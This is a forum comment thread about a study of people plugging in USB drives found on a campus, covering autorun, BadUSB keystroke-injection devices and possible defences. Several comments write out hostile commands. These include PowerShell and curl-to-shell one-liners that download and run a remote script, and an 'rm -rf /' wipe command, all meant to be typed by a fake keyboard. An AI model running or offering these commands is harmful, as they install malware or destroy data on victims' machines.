People are simple like that. Every so often someone asks me what the best way to crack (misc.) password is. I tell them to ask for it.

Automatically good?

[capntao]

"a USB stick given away at a trade show is automatically good." the hell ever gave you that idea? a USB stick in original packaging could have malware all up ins for all you know.

Re:Automatically good?

[sims+2]

https://it.slashdot.org/story/...

yeah brand new drives straight from the manufacturer.

Re:Automatically good?

[david_thornley]

There was a case a long time ago where iPods built by one factory would infect Windows machines they were plugged into. It's not safe to trust anything just because it's fresh from the factory.

USB authorization

[rastos1]

That's why we have USB authorization. Since 2007.

Re:USB authorization

[snadrus]

Awesome! These are the kinds of innovations that prove that Linux is ahead of the pack.

BUT

Without major distros enabling & UI prompting on connect, I would only know about it from your post.
So I gamble I'm safe & ignore the whole thing.

What Linux Desktops need is a UI that offers 10% of the greatness the Kernel added in the past decade.

What kind of dumb OS...

[Pfhorrest]

What kind of dumb OS autoruns anything off of any volume the moment it's connected without any request from the user?

Oh right, Windows. Well, there's your problem.

Re:What kind of dumb OS...

It doesn't even have to involve autorun: https://www.blackhat.com/us-14/briefings.html#badusb-on-accessories-that-turn-evil

Once reprogrammed, benign devices can turn malicious in many ways, including:

        A device can emulate a keyboard and issue commands on behalf of the logged-in user, for example to exfiltrate files or install malware. Such malware, in turn, can infect the controller chips of other USB devices connected to the computer.
        The device can also spoof a network card and change the computer’s DNS setting to redirect traffic.
        A modified thumb drive or external hard disk can – when it detects that the computer is starting up – boot a small virus, which infects the computer’s operating system prior to boot.

Re:What kind of dumb OS...

[thegarbz]

What kind of dumb OS autoruns anything off of any volume the moment it's connected without any request from the user?

Oh right, Windows. Well, there's your problem.

None of them is the correct answer.
Now what kind of computers are vulnerable to nefarious USB devices? All of them. In some case even when they are powered off.

Re:What kind of dumb OS...

[tepples]

What kind of dumb OS autoruns anything off of any volume the moment it's connected without any request from the user?

Any OS that trusts a newly connected USB keyboard.

Re:What kind of dumb OS...

[Narcocide]

mod parent up

Screw all the drives!

[PessimysticRaven]

Blame the OS? Nope. I'll blame the Operator, not the Operating System.

Woah!

[fullback]

The intro says: "The problem isn't that people are idiots..."

Let's stop right there. I know for a fact that this premise is wrong.

Re:Woah!

[DaveMikulec]

I miss the "old days" when only us nerds/geeks had computers. One's that we had built ourselves.

Trust your own

[U2xhc2hkb3QgU3Vja3M]

As a Canadian, I cannot trust either China nor the USA about spyware and trojans. This means that unless the USB drive is made of wood and smells like maple syrup, I don't trust it.

Re:Trust your own

[flyingfsck]

Cool. You almost made me snort my Coke, eh?

Re:Trust your own

[vandamme]

Why are you not drinking Molson's?

Re:The chance of getting juicy selfies are a lot h

Probably, and college students probably don't have corporate security training. It's much more interesting when the thumb drives are dropped outside a supposedly secure business.

There's no way to secure college networks at endpoints owned by students. The security needs to happen elsewhere.

Re:disable auto-run

[GLMDesigns]

Most people have no clue what a VM is. This includes highly intelligent and educated people.

Re:Do this under Linux

[U2xhc2hkb3QgU3Vja3M]

Short story: do this in a VM.

No surprise here

[TheAngryCat]

Just look at how people will engage in sex with another human not knowing when or with whom that human has last had sex with. 72% of the population doesn't deserve to live due to their carelessness.

Re:No surprise here

[khz6955]

@TheAngryCat: "Just look at how people will engage in sex with another human not knowing when or with whom that human has last had sex with. 72% of the population doesn't deserve to live due to their carelessness."

Not the same, a more apt analogy would be buying a latte, opening the lid and then discovering you've picked up a dose from the minimum-waged servitor from behind the counter.

In other news

[tom229]

The sun rose in the East today and set in the West. More at 11.

Still?

[QuietLagoon]

From Wired in 2011 The dropped drive hack.

...They say that Stuxnet got deployed like this. Awesome hack, Stuxnet....

Staff secretly dropped computer discs and USB thumb drives in the parking lots of government buildings and private contractors. Of those who picked them up, 60 percent plugged the devices into office computers, curious to see what they contained. If the drive or CD case had an official logo, 90 percent were installed....

Quick question

[Okian+Warrior]

I turned off autorun on any external media a long time ago, back when sony cd's were injecting rootkits under the guise of DRM circa 2005. Nothing on insertable media autoruns on my PC.

Just a quick question.

Suppose the device identifies as a USB keyboard, or identifies as a dual use device USB stick/keyboard?

Suppose the keyboard device is generic, doesn't require a driver, and the micro on the USB stick starts to type things on your computer.

Could that install malware on your system?

(Of course, I didn't need to identify keyboard devices specifically. There are a bunch of devices that a USB device can identify as, some of which allow data to be loaded onto your computer.)

Re:Quick question

[cmiller173]

I generally don't run with full admin privileges (ability to install) on my system, although that would certainly work on my wife's laptop. I really gotta get her PC locked down, damn the inconvenience.

Re:Quick question

[NotAPK]

My business idea is the "USB Condom". It's a USB inter-connect to go between your device and the host. It runs in two modes: - charging only. The device will negotiate power delivery and pass the current back to the device. Nothing else gets through. This is used to protect a device (such as a smart phone) from an unknown/untrusted host. - data only. The device can present as a USB mass storage device, but all other devices are blocked. This is used to protect a host from an unknown/untrusted device, like in this article. This would involve an embedded system that runs rather sophisticated code to inspect USB packets, or even present as a hub. I'm sure it could be miniaturized quite nicely. I have other things to do: does anyone want to make this?

Re:Quick question

[U2xhc2hkb3QgU3Vja3M]

It's easy enough to do the dumb version of the charging only version (limited to 500mA), I wonder why we don't see more of these.

Re:Quick question

[NotAPK]

I know what you mean, but negotiating the higher charging currents would be pretty sweet. My older SGS2 can barely tread water with 500mA charging.

Re:Quick question

[mattventura]

Easy enough, just have the device identify as both a flash drive AND a keyboard. Keyboard presses Win-R and types the path to the malicious file on the drive.

Re:Quick question

[dotgain]

My business idea is the "USB Condom".

I have other things to do: does anyone want to make this?

Yes. You should google the name of your idea, you'd see that someone's already making it under exactly that name. Sorry, bub.

Re:Quick question

[NotAPK]

Sure, and I've been posting this crap around the internets for years and years, so no wonder someone has *finally* made it into something real. Awesome. Though, the devices on Google don't negotiate the higher current for charging. I realise there are plenty of ways to do this because it's outside the USB spec, but I've always had something a little more sophisticated in mind...

Not only USB "Drives"

[fullmetal55]

Commvault gave away as swag a few years ago (2011 I believe), a device that looked like a common trade show USB key. However instead of being an actual useful USB key, (it wasn't even a storage device) it behaved like a USB keyboard, upon loading, hit winkey - R, and typed in a webpage, (you could see the letters type across the screen). When I first saw those, it wasn't hard to imagine how easily those could be abused for just this scenario. Heck, you could theoretically have it do all kinds of sneaky things in the background as a keyboard input. All you needed to do is plug it in, and it will run. Doesn't matter about auto-mounting or Auto-run since it's not a storage device, but a "keyboard". Other OSes could theoretically be susceptible to it as well since most OSes can take keyboard commands.

Re:Not only USB "Drives"

[rahvin112]

You do realize they can do a mouse just as easily (even at the same time) and even bypass UAC dialogs just as easily?

Re:disable auto-run

[Tuidjy]

The problem is that the USB drive can identify as a different kind of device, like a keyboard, run commands, download and install software, and even interact with the security modal screens.

Windows Only?

[Agent0013]

Did they account for people who opened and looked at the USB key, but their computer did not auto-run whatever was on there that phoned home? What about people who have the auto-run disabled in Windows, or people who run a smarter OS, like perhaps Linux or Mac or BSD? (I'm not actually sure if these OS's are smarter than Windows, but it seems like they might be.)

In 1989, it was floppies

[mbone]

In 1989, people would plug random floppies into their computers. At least one early computer virus was spread that way. The more things change...

Re:In 1989, it was floppies

[jfdavis668]

Almost all early computer viruses spread this way.

Re:In 1989, it was floppies

[Cro+Magnon]

At least the floppies didn't auto-run. You were safe unless you actually booted the computer with the durn thing.

Re:In 1989, it was floppies

[mbone]

At least the floppies didn't auto-run. You were safe unless you actually booted the computer with the durn thing.

IIRC, "Stoned" would infect any machine that mounted an infected floppy.

Re:In 1989, it was floppies

[WinstonWolfIT]

Bollocks. Mounting a floppy never ever executed code. Stoned was a boot sector virus.

Re:In 1989, it was floppies

[dotgain]

No, Stoned was a boot-sector virus.

Re:In 1989, it was floppies

[Sperbels]

I seem to recall Macintoshes back then used to autorun floppies.

Re:In 1989, it was floppies

[ssufficool]

I once over punched a Hollerith card to cause a buffer overflow on a UNIVAC iron core memory subsystem. First trojan FTW!

Re:In 1989, it was floppies

[Tablizer]

At least the floppies didn't auto-run.

Note quite. If you inadvertently left a floppy inserted and restarted your PC (or it crashed and restarted), it would try to boot from the floppy WITHOUT ASKING. Virus were spread this way.

That's partly because the pre-harddrive conventions were still in place, and in the old days you often did boot DOS from floppies. Plus if your hard-drive crashed or got too corrupted to boot, you could boot from a DOS disk to run diagnostics.

Nothing wrong with that idea, EXCEPT it should prompt you if the primary boot drive as specified in the bios is not available.

Re:In 1989, it was floppies

[david_thornley]

If you want more detail on that...

Back when we were on Mac OS 7 or so, the UI was handled by resources that were loaded by the Resource Manager. Windows resources were WDEFs, menus were MDEFs, and I don't remember all the others. The Resource Manager had a list of places to check for these resources, and the floppy was higher on the list than the regular OS. One enterprising virus writer wrote a virus that appeared to the OS to be a WDEF file. When the floppy was inserted, the OS needed to update the display to show it, which meant grabbing the windows definition resource from you-know-where and executing it.

It had been written to be harmless other than spreading itself, but it wasn't completely bug-free and it did screw up the next version of the OS.

Old news, but somehow still relevant.

[Euphorinaut]

I have mixed feelings every time I see this. Every time I see one of these articles come across, there's a flood of comments about how its not news, and each time I see it I lean closer to the notion that this paradox of "non-news" that in and of itself is caused by a lack of awareness(which can only be remedied by news) might be dragging along by the dead weight of our habit to only share this knowledge with the tech crowd that already knows about it. This knowledge can only do so much unless it makes its way to those people who keep on asking me to reset their password because they forget that caps lock is on.

Re:Old news, but somehow still relevant.

[flyingfsck]

Well, Linux will actually warn you that your Caps Lock is one. Why doesn't Winders do that?

But how about porn?

[Parker+Lewis]

It has a small chance to have porn content, or at least, nudes! I can take that risk!

Re:Do this under Linux

[Joe_Dragon]

sudo rm -rf / --no-preserve-root

from the fake keyboard.

Well, then fix it.

[bmo]

The problem is that the OS will automatically run a program that can install malware from a USB stick.

Mine doesn't. I know of no Linux or BSD machine that automagically runs any kind of +x'ed code on any kind of removable media.

At least not out of the box. Gee, I wonder what OS is designed for "convenience" rather than protecting the user, and their computer.

Does it start with a W?

--
BMO

Re:disable auto-run

[cfalcon]

The problem is that you just plugged in a keyboard, and it will execute command keys and type stuff in to make itself able to run remote code.

Re:Not sure what happened

[Joe_Dragon]

Tried to update the raid firmware with out shutting down data usage? Forced an unclean reboot to the diagnostics?

The issue isn't People - it's the Autoplay

[wardrich86]

If you put a floppy in your computer, would it autoplay? No.

Do your external hard drives autoplay when you put them in? Nope!

The issue here is the bullshit autoplay. CDs and DVDs are guilty of that as well. I have no idea why it's a default feature on computers... the default should be to just open the volume like a drive to allow you to peruse the files on the medium and select what you want to open.

IMO this is a HUGE failure on the OS and whoever decided to allow Auto Play to be a thing.

What about killer USB?

[Joe_Dragon]

https://motherboard.vice.com/r...

Re:People are stupid [Not]

[Tablizer]

No, the people are NOT stupid.

Logically a data drive should have data and only data from the computer's perspective, and not run any executables or scripts on it without first explicitly asking. It should be designed that way from the start. That's how Vulcans would design it.

The fact that it's so easy for hackers to bypass what SHOULD be normal and expected is a failure of the technology and/or standards, NOT of consumers.

Re:The chance of getting juicy selfies are a lot h

[sexconker]

Yeah right.

I'm not most people, but I did exactly this (with an SD card).

I went through photos on the card, managed to fine one that included a USPS package, transformed the image to read a partial name and was able to scan the barcode to get a zip, looked at other photos and compared them to Google/Bing maps and found the street but not the address, then found several profiles on the web, ultimately matching one photo to a Facebook account using a cropped version as the profile photo.

I then created a throwaway email account to create a throwaway Facebook account under the name of Natalie FoundUrSDCard or some such, messaged her and posted the uncropped version of her profile photo, and waited.

She responded and sent her uncle to come pick it up.

He did.

Really?

[twotacocombo]

The problem isn't that people are idiots

Yes, it is. Would you pick up a random needle off the street and stick it into your vein, then wonder how you got AIDS? Would you stick your dick in some random person you found behind a 7-11, then wonder how you got the clap? It's not the computers fault you stuck an unknown, infected USB drive in it. Take some responsibility for your actions already. This is absolutely nobody's fault but your own, so stop doing stupid shit and then playing the victim card.

The problem is that it isn't safe to plug a USB stick into a computer.

Bullshit. It's perfectly safe to insert a USB stick into a computer, as long as there's nothing malicious on it. Knowing whether or not there's anything damaging on it is up to you, and there's always a risk (even fresh out of the package), but to imply that all sticks are dangerous is just FUD. I've never picked one up off the street, or met one in a truck stop bathroom, and I've never had a bad experience with a thumb drive. Just use some common sense, and take the proper precautions.

Re:Really?

[burtosis]

The problem isn't that people are idiots

Yes, it is. Would you pick up a random needle off the street and stick it into your vein, then wonder how you got AIDS? Would you stick your dick in some random person you found behind a 7-11, then wonder how you got the clap? It's not the computers fault you stuck an unknown, infected USB drive in it. Take some responsibility for your actions already. This is absolutely nobody's fault but your own, so stop doing stupid shit and then playing the victim card.

The problem is that it isn't safe to plug a USB stick into a computer.

Bullshit. It's perfectly safe to insert a USB stick into a computer, as long as there's nothing malicious on it. Knowing whether or not there's anything damaging on it is up to you, and there's always a risk (even fresh out of the package), but to imply that all sticks are dangerous is just FUD. I've never picked one up off the street, or met one in a truck stop bathroom, and I've never had a bad experience with a thumb drive. Just use some common sense, and take the proper precautions.

Have you seen the custom made USB drive that fries your laptop like an egg?

Re:Really?

[david_thornley]

Humans are curious. Given something unexpected, the human is likely to wonder about it. The obvious way to check on a needle is carefully, making sure not to stick oneself, if one does check, considering that it will be instinctively recognized as SHARP - DANGEROUS! Even if you did want to examine it, sticking it into a vein is unlikely to provide useful information. A USB drive is a harmless plastic thingy, and the only way to find out what it is is to plug it into a USB reader.

Can you get condoms at a 7-11? (It's been a long time since I was in a 7-11, and a long time since I bought condoms. Monogamy and a vasectomy take care of the risks a condom would protect me from.) If so, you ask the random person behind the store to wait a moment, and you're reasonably safe from infection. What's the equivalent for a USB drive? Where do I get a way to read a USB drive in reasonable safety?

An unknown USB drive might belong to someone, and might be important to them. Unless there's something written on the outside, the only way to hope to find the owner is to plug it in and look at it. Many people like to be helpful that way.

The problem is that evil USB drives are an insidious trap, not that people are stupid. Expecting people in general to know all the angles of a particular technology is unrealistic, and calling them idiots for not being knowledgeable in computer security is idiotic.

Real or mock mocking!

[ramriot]

Should we also mock Bruce for saying:-
"The problem isn't that people are idiots, that they should know that a USB stick found on the street is automatically bad and a USB stick given away at a trade show is automatically good."

I would say the latter is still suspect, what with Bad-USB firmware and other stuff, just because someone you trust gives you something, the trust does not extend to the something.

Re:Real or mock mocking!

[dbIII]

I assumed the latter was some sort of attempt at a joke. It looks like it.

Sounds like a business opportunity

[davidwr]

First person to invent a cheap, provably secure, not-already-patent/intellectual-property-encumbered "USB condom" (really, a very small computer) that sits between my computer and a USB stick which disables boot, Windows-auto-run, device-driver shenanigans, and the like gets the win.

--
One of many possible ways to do this:
* Assume the device is a generic USB memory stick. If it's not, fail.
* If it is, attempt to access the files using generic methods. If it doesn't work, fail.
* If it's not a recognized filesystem (fat-variations, ntfs, ext2-variations, possibly others), fail.
* Present the directory-tree to the user's real computer a sub-tree so any files the host sees in the "root" directory as "special" aren't there.
* Present the "device" to the host as read-only.
* Consider simply not presenting well-known files like autorun.exe to the host computer at all.

The hard part will probably be that future USB sticks may not work with today's "USB condoms" as, by definition, the "condoms" would not trust any device-driver-like code that resides on the USB stick. This can be partially mitigated if the USB stick's device-driver-like code is signed and the signer's key is trusted by the "USB condom." But this is not without its own risks.

--
Bonus points if the "USB condom" it also stops hardware trojan horses like the "plug me in and 30 seconds later I'll fry your USB port" devices, even if it has to die in the process.

-------------
Note - I haven't done a Google search - such a thing may already exist. If it's cheap (under $10) and proven to provide protection without doing harm, I'm interested in buying a few.

No shit sherlock?

[Austerity+Empowers]

I think this story runs once a year, choir having been preached to, problem continues.

Re:The chance of getting juicy selfies are a lot h

[thegarbz]

I think you have your statistics backwards. The number of people carrying around juicy selfies on a USB stick is considerably lower than the amount of USB sticks containing malware.

Mobile phone may be different.

Re:The chance of getting juicy selfies are a lot h

[narcc]

That seems incredibly likely to me as well.

College students are poor, and their data is very important to them. A lost drive could be difficult to replace, to say nothing of the potential to find countless hours of work lost forever. Any normal person would want to identify the owner and return the drive.

To the Slashdot cynics: Considering all the factors surrounding the drives, don't you think that someone who was already well-aware of the risks of accessing drives of dubious origin would consider the threat minimal? A risk so low that it's better to act as a humanitarian, on the (very high) chance that it would save some poor student a lot of trouble? Wouldn't they hope their fellow students would act similarly, disregarding the pitifully minimal risk to try to return the drive, should they have been the one who had lost one?

Re:People are stupid [Not]

My computer doesn't run shit when I plug in a USB drive.

On the other hand, I don't use Windows. Auto-run is the stupidest thing ever invented.

Malware is the lesser problem

[burtosis]

Real malicious people drop devices that look like USB sticks, but in reality contain a bank of capacitors that slowly charge then deliver a high voltage mega death zap to your USB port. Those puny TVS designed for static don't stand a chance and it perma fries the entire machine.

USB keyboard. Your computer DOES run the commands

[raymorris]

You assume that USB stick is a flash memory device. Being nasty, it tells the computer that it's a keyboard. Your computer almost certainly processes keyboard commands just like other computers do. I've built one of these.

Mass mailing devices to offices

[swb]

I wonder how often black/grey/white hats have mailed compromised devices to offices.

If you started mailing compromised 5 port switches or something to random offices, especially branch offices, I would bet that lots of them would end up getting plugged in and used.

Sure, I'd plug it in

[mi]

Would you plug in a USB drive that you found on the ground?

I'd insert the thing into my FreeBSD computer and explore the files looking for identity of the owner — so that I can try to return it, if possible.

If not, I'll reformat it and keep it. I suppose, it may be possible to attack me — such as by carefully exploiting some unknown vulnerability in the msdosfs.ko or but I doubt it. Not only are they unlikely to exist, even if there is something, exploiting a custom-built kernel is much more difficult than simply kidnap and torture me for secrets. It may crash, but is unlikely to do, what you want.

Maybe, you can get me through libreoffice, which I may try to use to open files identified as office documents, but even that is most unlikely — because the software is custom compiled for the specific -march and with compiler's protection against stack-smashing attacks. Again, you may succeed in crashing it, but not in obtaining anything useful.

The problem isn't that people are idiots [...] The problem is that the OS will automatically run a program

The OS is a commercial offering providing, what people pay money to have. People paying for Windows are idiots. I wouldn't voluntarily use it even if it were free...

Re:USB keyboard. Your computer DOES run the comman

[nine-times]

That's clever, but the attack isn't going to be extremely simple to pull off. First, you have to know what kind of system you're plugged into-- what keyboard shortcuts will get you to a command line, what commands can be run at that command line. If the system is slower than you expect, if it takes too long to execute something, your input might not go where you expect it to. If the user is sitting in front of the computer at the time, there will be a limited span of time to execute what you want to, since the user can type something else, change which window is active, or do any number of things to interrupt your process.

I've had some experience in trying to make macros that would replay keyboard/mouse input in order to run certain applications and execute commands, and it's amazing the kinds of things that can throw it off, even when you're working on a known/controlled system. I bet it'd be possible to make one that, to give an example, if you knew exactly what OS you were using, it would launch the CLI and delete the current user's home folder. I wouldn't bet on getting reliable results doing anything much more complicated than that.

BadUSB

[Foresto]

Obligatory link to the BadUSB project, including proof-of-concept:

https://srlabs.de/badusb/

Re:USB keyboard. Your computer DOES run the comman

[Tablizer]

Being nasty, it tells the computer that it's a keyboard...

OS should prompt to verify. "A new peripheral has been detected. It claims to be a keyboard. Is this correct?"

True, if you don't have a keyboard (and no mouse yet) you cannot tell the computer if you approve or disapprove.

A partial solution would be to display a message and give the user 90 seconds to respond.

"A new device that claims to be a keyboard has been detected (plugged in). If you don't reply within 90 seconds, the keyboard will be accepted."

Of course I'd plug it in.

[TechnoWeenie]

If I was a college student and found one of these drives, I would definitely plug it in to see what was on it.

Not on MY computer, but it can't be hard to find and unguarded USB port on a college campus.

Re:USB keyboard. Your computer DOES run the comman

[phantomfive]

Another solution: if a keyboard is already plugged in, prompt for a warning. If a keyboard is not plugged in, accept it.

...but Autoplay is a FEATURE, not a bug...

[chaoskitty]

Microsoft has smart people, and they say that Autoplay is a FEATURE. Anyone who says otherwise is dumb. Where's your multibillion dollar company to prove you know what you're talking about? Macros that move along with Microsoft Office documents? FEATURE, people. FEATURE.

Seriously, though, mainstream OSes should've had this protection ages ago. The BSDs can be compiled to only recognize certain devices on USB, and, if desired, only the first of each kind (so the keyboard that was recognized at boot can't be "replaced" with a device that appears to be the exact same keyboard).

Hell, if you want to be an a-hole

[phorm]

Just drop some USB devices with certain key wires crossed... bad things are bound to happen.
You don't even need to pick up a random device for this, I've had it happen with store-bought stuff

Re:disable auto-run

[messymerry]

The problem is that your average granny isn't going to know how to do that. If M$ gave a crap, autorun would be off by default.

Re:Can't blame "people"; it's the industry's faili

[rahvin112]

You did see the malicious USB "drive" that was actually a transformer right (developed as an exhibit on how dangerous random USB can be)? It took about a second for it to build up 240V and send it back through the port. First pulse dropped the screen and probably everything else as well, the second pulse killed the whole laptop power system. And it all happened before you could even pull it. It also would keep pulsing until power to the port stopped.

Re:People are stupid [Not]

[JustAnotherOldGuy]

No, the people are NOT stupid.

Thousands upon thousands of years of history disagree.

Re:disable auto-run

[JustAnotherOldGuy]

Disable auto run always, never open executables outside of your Vm, what's the problem?

The sentence above would mystify at least 50% of the people you'd find wandering around almost any campus or city street.

They'd say, "Disable what? Never open what outside of what?"

Re:People are stupid [Not]

[Cro+Magnon]

Unfortunately, the most popular desktop OS wasn't designed by Vulcans. It was designed by Ferrengi.

Really?

[markdavis]

>"The problem is that the OS trusts random USB sticks. The problem is that the OS will automatically run a program that can install malware from a USB stick. The problem is that it isn't safe to plug a USB stick into a computer."

Really? I have used hundreds of Linux machines for dozens of years. Not a single one has automatically run a program or automatically opened a file from a USB drive. Ever.

I have also plugged into many Android devices- never seen anything run automatically on those either.

WebRequest tinyurl.com/hfgrhd | powershell.exe

[raymorris]

Trying to do much through the GUI could be quite error-prone, though errors are acceptable. The more normal approach would be for the keyboard to run something like this single command for Windows, which tells the OS to download and run a script:

Win+R Invoke-WebRequest tinyurl.com/hfgrhd | powershell.exe

And / or this for Linux and Mac:
Ctrl-Alt+F1 curl http://tinyurl.com/hfhfh | sh
Ctrl-Alt+F7

Powershell or /bin/sh takes over from there - the victim could yank the trojan device out and the malicious script will continue to run in the background.

Re:WebRequest tinyurl.com/hfgrhd | powershell.exe

[postglock]

You'd still have to log in before using a TTY. However, I think many Linux DEs use Alt+F2 for "run".

Re:WebRequest tinyurl.com/hfgrhd | powershell.exe

[MrL0G1C]

Win+R Invoke-WebRequest...

Nothing happens, windows 7 doesn't seem to know anything about 'invoke-webrequest'

And wouldn't this just open the browser?

Re:The chance of getting juicy selfies are a lot h

[thewolfkin]

My guess is a fair amount of people open them just in an attempt to ID the owner so they can return it.

I'm guilty of this. I get annoyed when people don't put a readme.txt in the root. It's the first thing I do with a device. So far I've been able to contact 2 people and return 3 more. with one that had enough files that I knew what class they took but nothing with their name on it. It's interesting that I've never considered the malware with Windows no longer doing auto run to the great annoyance of my PortableApps install I figured :shrug: what're the chances.

Re:The chance of getting juicy selfies are a lot h

[thewolfkin]

Yeah right.

I'm not most people, but I did exactly this (with an SD card).

I went through photos on the card, managed to fine one that included a USPS package, transformed the image to read a partial name and was able to scan the barcode to get a zip, looked at other photos and compared them to Google/Bing maps and found the street but not the address, then found several profiles on the web, ultimately matching one photo to a Facebook account using a cropped version as the profile photo.

I then created a throwaway email account to create a throwaway Facebook account under the name of Natalie FoundUrSDCard or some such, messaged her and posted the uncropped version of her profile photo, and waited.

She responded and sent her uncle to come pick it up.

He did.

no man.. you're my hero. This is the level of comfort I want to have with file digging.

Only a problem because of automatic execution

[Karmashock]

Automatic execution is a dumb idea and needs to go away. What is more, the same execution warnings that exist when you directly execute a downloaded file from a browser should exist when you execute a file on an UNKNOWN USB drive. I don't think it would be that hard to flag given USB drives as known and unknown.

And regardless... auto execution remains retarded. Its one of the many things I make sure is disabled on all my systems.

Yes, but not easy. Alt-PrntScrn is System Request

[raymorris]

That's the concept that is proposed as a solution, but it's not trivial to implement. If you've ever tried to boot a machine with no OS on a properly connected drive, or indeed used BIOS, you know that the keyboard functions without needing permission from any operating system.

Specifically, the System Request key (typically Alt-PrntScrn) is used to debug operating systems and CPU hardware. SysRq commands can do things like pause the OS kernel, and dump RAM.

To prevent trojan HID attacks, the motherboard and the OS will need to communicate using some new protocol. The motherboard will have to give the OS an opportunity to block new hardware while the OS prompts the user.

Re:Soemtimes random USB keys are fun to check out

[Sperbels]

Was it called "pretty good pr0n vid.exe"?

Re:People are stupid [Not]

[Jeremi]

Logically a data drive should have data and only data from the computer's perspective, and not run any executables or scripts on it without first explicitly asking. It should be designed that way from the start. That's how Vulcans would design it.

The problem isn't data drives, so much as devices that look like data drives but also do other more "interesting" things when plugged in. ;)

USB was designed to do many things, data drives was just one use case. USB's flexibility is what allows hackers to hack.

USB sticks pretending to type Win+R

[hankwang]

Good luck typing Win+R with my Dvorak keyboard layout... Or can HID devices generate actual ascii/unicode symbols rather than scan codes?

Re:USB keyboard. Your computer DOES run the comman

[simcop2387]

No idea if he has, but it can be done for http://www.aliexpress.com/item...

Re:USB keyboard. Your computer DOES run the comman

[simcop2387]

This meant to say less than $2 and a link to an aliexpress page for an arduino nano knock off.

Re:People are stupid [Not]

[S.O.B.]

The love child of a Ferengi and a Pakled might be closer.

USB Battery Charging

[tepples]

Those things are so cheaply constructed that it is a physical impossibility that they would successfully negotiate a USB data connection.

A Dedicated Charging Port that conforms to the USB Battery Charging specification doesn't need to "successfully negotiate a USB data connection".

Re:USB Battery Charging

[MightyYar]

I agree - but such a connection would be necessary to compromise a system. (I think.)

Basically how I did it (first for screen saver loc

[raymorris]

That's basically what I did; I used the same chip used by the Arduino Nano, flashed with the Arduino bootloader, without the Arduino circuit board.

At first, I put it together to brute-force an Android PIN overnight. Then I adjusted the code slightly to keep a Chromebox from going into power saving mode, because the Chromebox was running a wall-mounted display.

Having a tiny USB device that acts as a keyboard and nothing more to do with it, mounting it in an old flash drive casing was the next logical step for a security geek like myself.

Not for me

[aglider]

My personal computer is immune as is has only 2 serials rs232 and a parallel port. You should try dropping some 5.25" floppy in order to test my security levels. Check your virus can run along with my DiskOS within 640 KB!

* Arduino ProMicro

[raymorris]

Actually mine was a treated as a Pro Micro. I think the Nano uses the older chip, which only works as a USB host, not a USB gadget.

It downloads and runs a program

[raymorris]

There are a few characters missing from the code I posted. I don't have a Windows machine handy to test with at the moment, in order to catch any errors. It would actually be more like:

Win+R powershell -command 'Invoke-WebRequest http...

Invoke-WebRequest downloads a URL, like a browser would, but then we use the pipe character | to send the content of that URL to powershell. Powershell is kind of like cmd.exe, but more powerful. If you do Win+R cmd.exe you'll see what looks like a DOS prompt, where you can type commands. Powershell is that on steroids (and on crack).

Piping them together, you get "retrieve commands from http://tinyurl.com/jfjdhd and run them using powershell ".

The Linux/Unix/Mac version is similar:

curl http://tinyurl.com/hacker | sh

Curl gets whatever is at that URL and sends it to "sh". Sh, the shell, is the "DOS prompt" of Unix, and runs whatever commands that curl got from the internet.

Re:It downloads and runs a program

[houghi]

At least use a real working URL:
curl http://houghi.org/trojan | sh

It is not a Trojan, I promise.

students != "a lot of people"

[PJ6]

The researchers dropped 297 USB flash drives on a university campus

Come on. Of course students are going to pick them up.

Re:The chance of getting juicy selfies are a lot h

[ImprovOmega]

That was some epically beautiful nerdiness right there.

Plug it in? Yes. Carelessly? No.

[aklinux]

I have Linux boxes...

gparted

[flyingfsck]

I plug it in and format it with ext4. Never had a problem.

Re:Wrong problem

[Karmashock]

That's often as not because windows programs require admin rights to not error out. I'm not saying they "need it"... I'm saying they require it.

A more reasonable option would be sandboxed admin rights... or pseudo-admin rights. The idea would be that you "tell" the program it has admin rights and you make it "appear" as if it has them. But it doesn't actually.

In addition, too many windows systems are co-located when they should be segregated. Why is everything writing to the system Registry Hive? I'd like to restrict registry writes... and most registry reads to the Windows OS itself. Program X or Y can write to a preference file stored in the application directory. And assuming the program was designed to work with a system registry, then simply redirect all registry reads or writes to a sandboxed Registry that contains what that program needs it to contain and doesn't contain anything it doesn't need to contain... and by need... I mean what it needs for it to work. Which is often not even accurate information so much as given types of entries with default information etc.

The whole registry paradigm for storing general application settings for any given program is insane.

I'd actually go farther than that given free reign and segment the registry so that every given driver etc had its own configuration file distinct from anything else.

Here someone might ask "how do we audit that!?" or update it... well do we have the ability to have a program gather and amalgamate all the system preference files in a few dozen folders and break them down into some organized tree like what we have with the registry? This is technology we have. So... bingo.

Here is one of the things I like about this... if a given driver gets corrupted or something, I can overwrite the folder with a backup or something and it will overwrite the driver, the settings, etc... everything to do with that driver in one shot. As it stands now, maintaining a lot of things is a pain in the ass. We have a lot of all or nothing approaches that are needlessly crude.

Regardless... I don't like automatic execution and disabling that whole feature in the operating system is one of the first things I do in a computer.

Computers and infection from malicious USB Drives?

[khz6955]

Only if their computer is running Microsoft Windows on Intel hardware. Why is it 'computers' when Windows is involved but when a bug is discovered in say for instance Apple iOS or Linux, there is no problem mentioning the underlying Operating System and Platform - Microsoft Windows - the OS that still can't tell the difference between OPEN and RUN. It doesn't take a scientist to figure this out.

Re:USB keyboard. Your computer DOES run the comman

[Fnord666]

Who remembers the infamous "No keyboard detected. Press F1 to continue.." error message?

Never got any problem

[hcs_$reboot]

lsblk
mount /dev/sdc1 /mnt/dummy
ls -l /mnt/dummy

Software

[dbIII]

All of that can be done in software. The only reason we are whining about it is that the system with the problems is closed source and the owners of the system are not open to suggestions.

Re:People are stupid [Not]

[Tablizer]

I meant in this context or case. I thought that was obvious, or are you just joking around?

Re:People are stupid [Not]

[Tablizer]

Unfortunately [Windows] wasn't designed by Vulcans. It was designed by Ferrengi.

Okay. Perhaps we can rework the original claim to be:

"People are stupid to not know by now that MS is like Ferrengis rather than Vulcans."

Does a USB stick just run apps immediately?

[ceview]

So will any USB stick just automatically run a program? I'm on MacOS10.9.5 will it really just run an application?

Re:Soemtimes random USB keys are fun to check out

[adhdengineer]

surely that should have been "pretty good pr0n vid.avi.exe"

So people are like dirty sailors...

[fb0r]

...going from port to port?

trust USB's at trafe shows?

[advocate_one]

and a USB stick given away at a trade show is automatically good.

woah... they're should be even more suspect...

http://www.scmagazine.com/ibm-distributed-infected-usb-drives-at-conference/article/170862/

Re: Can't blame "people"; it's the industry's fail

[phaserbanks]

https://www.grahamcluley.com/2...

The video is somewhat anti-climactic, but there ya go.

Re:The chance of getting juicy selfies are a lot h

[Quirkz]

I get annoyed when people don't put a readme.txt in the root.

